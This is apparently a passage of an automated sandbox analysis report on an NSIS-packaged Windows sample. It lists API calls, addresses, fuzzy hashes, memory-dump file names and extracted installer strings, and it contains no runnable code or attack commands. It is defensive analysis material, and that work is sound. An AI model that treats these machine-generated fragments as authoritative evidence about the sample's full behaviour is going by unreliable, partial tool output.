                            • Instruction ID: 26e7699ed4e6b10e00d4509f8022fed07cb2a9a1b54ab9853cf40adcb97aba69
                            • Opcode Fuzzy Hash: 6eb3a8c6d4b6a1eb21d80e3e72b0c71cc60e502e6c5045bb4d9ce0f5c3d8f447
                            • Instruction Fuzzy Hash: 2B61C970340601BED620BB669D46F373EACEB54749F80447FF985B22E2CB7C59069A2D
                            APIs
                            • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 00404235
                            • GetDlgItem.USER32(00000000,000003E8), ref: 00404249
                            • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 00404267
                            • GetSysColor.USER32(?), ref: 00404278
                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404287
                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404296
                            • lstrlenA.KERNEL32(?), ref: 00404299
                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042A8
                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042BD
                            • GetDlgItem.USER32(?,0000040A), ref: 0040431F
                            • SendMessageA.USER32(00000000), ref: 00404322
                            • GetDlgItem.USER32(?,000003E8), ref: 0040434D
                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040438D
                            • LoadCursorA.USER32(00000000,00007F02), ref: 0040439C
                            • SetCursor.USER32(00000000), ref: 004043A5
                            • LoadCursorA.USER32(00000000,00007F00), ref: 004043BB
                            • SetCursor.USER32(00000000), ref: 004043BE
                            • SendMessageA.USER32(00000111,?,00000000), ref: 004043EA
                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                            • String ID: N$uA@
                            • API String ID: 3103080414-3275078707
                            • Opcode ID: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
                            • Instruction ID: fd9e69a661c90447e44b9af037de2c0158a1a23ec1d513a6b2b78bd76040a697
                            • Opcode Fuzzy Hash: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
                            • Instruction Fuzzy Hash: A26183B1A00205BFDB109F61DD45F6A7B69EB84705F10803AFB057A1D1C7B8A951CF58
                            APIs
                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                            • BeginPaint.USER32(?,?), ref: 00401047
                            • GetClientRect.USER32(?,?), ref: 0040105B
                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                            • DeleteObject.GDI32(?), ref: 004010ED
                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                            • SetBkMode.GDI32(00000000,?), ref: 00401126
                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                            • SelectObject.GDI32(00000000,?), ref: 00401140
                            • DrawTextA.USER32(00000000,0042EC00,000000FF,00000010,00000820), ref: 00401156
                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                            • DeleteObject.GDI32(?), ref: 00401165
                            • EndPaint.USER32(?,?), ref: 0040116E
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                            • String ID: F
                            • API String ID: 941294808-1304234792
                            • Opcode ID: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                            • Instruction ID: bc05fa60d2536021e17fc8d2ced0f843766159cda975d832d6f25ccf31630e85
                            • Opcode Fuzzy Hash: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                            • Instruction Fuzzy Hash: C8419C71800209AFCF058F95DE459AFBBB9FF44310F00802EF9A1AA1A0C774D955DFA4
                            APIs
                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,00405DA0,?,?), ref: 00405C40
                            • GetShortPathNameA.KERNEL32(?,0042C600,00000400), ref: 00405C49
                              • Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
                              • Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0
                            • GetShortPathNameA.KERNEL32(?,0042CA00,00000400), ref: 00405C66
                            • wsprintfA.USER32 ref: 00405C84
                            • GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,00000004,0042CA00,?,?,?,?,?), ref: 00405CBF
                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405CCE
                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D06
                            • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D5C
                            • GlobalFree.KERNEL32(00000000), ref: 00405D6D
                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D74
                              • Part of subcall function 00405B39: GetFileAttributesA.KERNEL32(00000003,00402DA3,00436C00,80000000,00000003), ref: 00405B3D
                              • Part of subcall function 00405B39: CreateFileA.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405B5F
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                            • String ID: %s=%s$[Rename]
                            • API String ID: 2171350718-1727408572
                            • Opcode ID: 2cfa5c40c2b605b7ef1c0ecf3cbe6f2e1654e9f538de3556496336cfe16ba9f3
                            • Instruction ID: 165561d39814ef1f1a34b1aa6794dd1f6cd1d2ce27369611909fe2f807e8c01f
                            • Opcode Fuzzy Hash: 2cfa5c40c2b605b7ef1c0ecf3cbe6f2e1654e9f538de3556496336cfe16ba9f3
                            • Instruction Fuzzy Hash: 5D310531200F19ABC2206B659D4DF6B3A5CDF45754F14443BFA01B62D2EA7CA8018EBD
                            APIs
                            • GetDlgItem.USER32(?,000003FB), ref: 00404520
                            • SetWindowTextA.USER32(00000000,?), ref: 0040454A
                            • SHBrowseForFolderA.SHELL32(?,00429C48,?), ref: 004045FB
                            • CoTaskMemFree.OLE32(00000000), ref: 00404606
                            • lstrcmpiA.KERNEL32(0042E3A0,0042A870), ref: 00404638
                            • lstrcatA.KERNEL32(?,0042E3A0), ref: 00404644
                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404656
                              • Part of subcall function 004056A0: GetDlgItemTextA.USER32(?,?,00000400,0040468D), ref: 004056B3
                              • Part of subcall function 0040620A: CharNextA.USER32(?,*?|<>/":,00000000,00435000,75A83410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406262
                              • Part of subcall function 0040620A: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
                              • Part of subcall function 0040620A: CharNextA.USER32(?,00435000,75A83410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406274
                              • Part of subcall function 0040620A: CharPrevA.USER32(?,?,75A83410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406284
                            • GetDiskFreeSpaceA.KERNEL32(00429840,?,?,0000040F,?,00429840,00429840,?,?,00429840,?,?,000003FB,?), ref: 00404714
                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040472F
                              • Part of subcall function 00404888: lstrlenA.KERNEL32(0042A870,0042A870,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
                              • Part of subcall function 00404888: wsprintfA.USER32 ref: 0040492E
                              • Part of subcall function 00404888: SetDlgItemTextA.USER32(?,0042A870), ref: 00404941
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                            • String ID: A
                            • API String ID: 2624150263-3554254475
                            • Opcode ID: cdde6bf5d860e80b1670e7dcdf7f51639cc8ffce7cf8acda1903fa5029e0e2f5
                            • Instruction ID: e7408234a4186d1eb777f56003ea07db5a22e6c17a70b9954916109459a63af9
                            • Opcode Fuzzy Hash: cdde6bf5d860e80b1670e7dcdf7f51639cc8ffce7cf8acda1903fa5029e0e2f5
                            • Instruction Fuzzy Hash: EEA170B1900219ABDB11EFA6CD41AAF77B8EF85314F50843BF601B62D1DB7C89418B6D
                            APIs
                            • GetTickCount.KERNEL32 ref: 00402D74
                            • GetModuleFileNameA.KERNEL32(00000000,00436C00,00000400), ref: 00402D90
                              • Part of subcall function 00405B39: GetFileAttributesA.KERNEL32(00000003,00402DA3,00436C00,80000000,00000003), ref: 00405B3D
                              • Part of subcall function 00405B39: CreateFileA.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405B5F
                            • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,00435C00,00435C00,00436C00,00436C00,80000000,00000003), ref: 00402DDC
                            Strings
                            • Inst, xrefs: 00402E48
                            • Null, xrefs: 00402E5A
                            • soft, xrefs: 00402E51
                            • Error launching installer, xrefs: 00402DB3
                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F3B
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                            • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                            • API String ID: 4283519449-1074636621
                            • Opcode ID: 0ada85f12cf01c90e965dc0c6425161c0b1bcf50f2fa52f3a00b6f97cbd218ea
                            • Instruction ID: 2bf3385630e85dd4df9d7bf2b803376e12afffe2b97a8d7f9aa5fd2bd7c684e6
                            • Opcode Fuzzy Hash: 0ada85f12cf01c90e965dc0c6425161c0b1bcf50f2fa52f3a00b6f97cbd218ea
                            • Instruction Fuzzy Hash: BD51F571900214ABDB219F65DE89B9F7AB8EB14368F50403BF904B72D0C7BC9D458BAD
                            APIs
                            • GetSystemDirectoryA.KERNEL32(0042E3A0,00000400), ref: 004060ED
                            • GetWindowsDirectoryA.KERNEL32(0042E3A0,00000400,?,0042A050,00000000,004050FF,0042A050,00000000), ref: 00406100
                            • SHGetSpecialFolderLocation.SHELL32(004050FF,75A823A0,?,0042A050,00000000,004050FF,0042A050,00000000), ref: 0040613C
                            • SHGetPathFromIDListA.SHELL32(75A823A0,0042E3A0), ref: 0040614A
                            • CoTaskMemFree.OLE32(75A823A0), ref: 00406156
                            • lstrcatA.KERNEL32(0042E3A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040617A
                            • lstrlenA.KERNEL32(0042E3A0,?,0042A050,00000000,004050FF,0042A050,00000000,00000000,?,75A823A0), ref: 004061CC
                            Strings
                            • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406174
                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 004060BC
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                            • API String ID: 717251189-730719616
                            • Opcode ID: 51f7f20917835abc90d04fd7ead949147b631891de6bb8cdcea0e0046e261de2
                            • Instruction ID: 67ab450255a0c50706d08a2588864b7c9a920b8361f3652e316ab2a1c483ee89
                            • Opcode Fuzzy Hash: 51f7f20917835abc90d04fd7ead949147b631891de6bb8cdcea0e0046e261de2
                            • Instruction Fuzzy Hash: C661E375900105AEDB209F24CD84BBF7BA4AB15314F52413FEA03BA2D2C67C8962CB5D
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: CountTick$wsprintf
                            • String ID: (TA$(TA$... %d%%
                            • API String ID: 551687249-2950751476
                            • Opcode ID: a0691e7d4b1972c1c6b665dba6ae3b2a2bfd9af5d6c8964951a9ca70517b3b3f
                            • Instruction ID: 5c281e24a88a3bae7ae2a550c5808c60fec2149314028a17d76778b6f2aa7d1b
                            • Opcode Fuzzy Hash: a0691e7d4b1972c1c6b665dba6ae3b2a2bfd9af5d6c8964951a9ca70517b3b3f
                            • Instruction Fuzzy Hash: BB518171900219DBDB00DF66DA4479E7BB8EF4875AF10453BE814BB2D0C7789E40CBA9
                            APIs
                            • GetWindowLongA.USER32(?,000000EB), ref: 004040C3
                            • GetSysColor.USER32(00000000), ref: 00404101
                            • SetTextColor.GDI32(?,00000000), ref: 0040410D
                            • SetBkMode.GDI32(?,?), ref: 00404119
                            • GetSysColor.USER32(?), ref: 0040412C
                            • SetBkColor.GDI32(?,?), ref: 0040413C
                            • DeleteObject.GDI32(?), ref: 00404156
                            • CreateBrushIndirect.GDI32(?), ref: 00404160
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                            • String ID:
                            • API String ID: 2320649405-0
                            • Opcode ID: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                            • Instruction ID: acf379a668eb7ba76ca74fd388386b38bd03efbb8d8a5887114ae3c25b447e5f
                            • Opcode Fuzzy Hash: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                            • Instruction Fuzzy Hash: 122174715007049BCB309F78DD4CB5BBBF8AF91710B048A3EEA96A66E0D734D984CB54
                            APIs
                            • lstrlenA.KERNEL32(0042A050,00000000,?,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                            • lstrlenA.KERNEL32(004030F7,0042A050,00000000,?,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                            • lstrcatA.KERNEL32(0042A050,004030F7,004030F7,0042A050,00000000,?,75A823A0), ref: 00405123
                            • SetWindowTextA.USER32(0042A050,0042A050), ref: 00405135
                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                            • String ID:
                            • API String ID: 2531174081-0
                            • Opcode ID: 57bc30585033a45ff0503b142d8cfa380acccc19d4d3abea87a767d6a2fe19a3
                            • Instruction ID: 4d1d9eb5ffa78b07b8376cbf0c4e91ada4ce3c5a86d4cc872ddc87c593067670
                            • Opcode Fuzzy Hash: 57bc30585033a45ff0503b142d8cfa380acccc19d4d3abea87a767d6a2fe19a3
                            • Instruction Fuzzy Hash: 69214A71900518BADB119FA5CD84A9FBFA9EB09354F14807AF944AA291C7398E418F98
                            APIs
                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049AD
                            • GetMessagePos.USER32 ref: 004049B5
                            • ScreenToClient.USER32(?,?), ref: 004049CF
                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 004049E1
                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A07
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Message$Send$ClientScreen
                            • String ID: f
                            • API String ID: 41195575-1993550816
                            • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                            • Instruction ID: 01adb620d992fda54c9cccfda8f446508f93e77e16c9618e278126a6ed05cf06
                            • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                            • Instruction Fuzzy Hash: 14015E75900219BAEB00DBA4DD85BFFBBBCAF55711F10412BBA50F61C0C7B499418BA4
                            APIs
                            • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C97
                            • MulDiv.KERNEL32(?,00000064,?), ref: 00402CC2
                            • wsprintfA.USER32 ref: 00402CD2
                            • SetWindowTextA.USER32(?,?), ref: 00402CE2
                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CF4
                            Strings
                            • verifying installer: %d%%, xrefs: 00402CCC
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Text$ItemTimerWindowwsprintf
                            • String ID: verifying installer: %d%%
                            • API String ID: 1451636040-82062127
                            • Opcode ID: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
                            • Instruction ID: 0a6faa1976aca28fcdfc9934e3507063152a2d7882a275f196f36718a2c25724
                            • Opcode Fuzzy Hash: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
                            • Instruction Fuzzy Hash: 8F014F7064020CFBEF249F61DD09EEE37A9AB04304F008039FA06B52D0DBB989558F58
                            APIs
                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062E1
                            • wsprintfA.USER32 ref: 0040631A
                            • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 0040632E
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: DirectoryLibraryLoadSystemwsprintf
                            • String ID: %s%s.dll$UXTHEME$\
                            • API String ID: 2200240437-4240819195
                            • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                            • Instruction ID: 4b2e1b96e526c3afc1937c3159904a09e8452480974eeaf1dbd8ebd71d3b02b5
                            • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                            • Instruction Fuzzy Hash: 87F0F63050060AABEB14AB74DD0DFEB375CAB08305F14047AAA87E11C1EA78D9398B9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID: $q$$q$$q$$q$$q$$q$$q$$q
                            • API String ID: 0-3886557441
                            • Opcode ID: 52685b3091568e86e0f6c50593274584095fac84fcf31587a9a943399d1471c0
                            • Instruction ID: c1dbdb409d891810134887c78653c5a6b8cbfa777dfed9ab38e19594061aba0d
                            • Opcode Fuzzy Hash: 52685b3091568e86e0f6c50593274584095fac84fcf31587a9a943399d1471c0
                            • Instruction Fuzzy Hash: EA91AF34A0130ADFEB18DB64C951BAE77F6EF84350F60892AE401A7395DF769C46CB80
                            APIs
                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
                            • GlobalFree.KERNEL32(?), ref: 004027EB
                            • GlobalFree.KERNEL32(00000000), ref: 004027FE
                            • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402816
                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                            • String ID:
                            • API String ID: 2667972263-0
                            • Opcode ID: d16b92c6e49c5f1eda150bd2065ff059c02a3c223b7b2492d8b40f99e43a7d67
                            • Instruction ID: a22fe22bcc3eabd59056b14894fa73c1d09c67f360634fc0aee3e8da3dcac443
                            • Opcode Fuzzy Hash: d16b92c6e49c5f1eda150bd2065ff059c02a3c223b7b2492d8b40f99e43a7d67
                            • Instruction Fuzzy Hash: 72219F71800124BBDF217FA5DE49E9E7B79AF09364F14423AF510762E0CB7959019FA8
                            APIs
                            • CharNextA.USER32(?,*?|<>/":,00000000,00435000,75A83410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406262
                            • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
                            • CharNextA.USER32(?,00435000,75A83410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406274
                            • CharPrevA.USER32(?,?,75A83410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406284
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
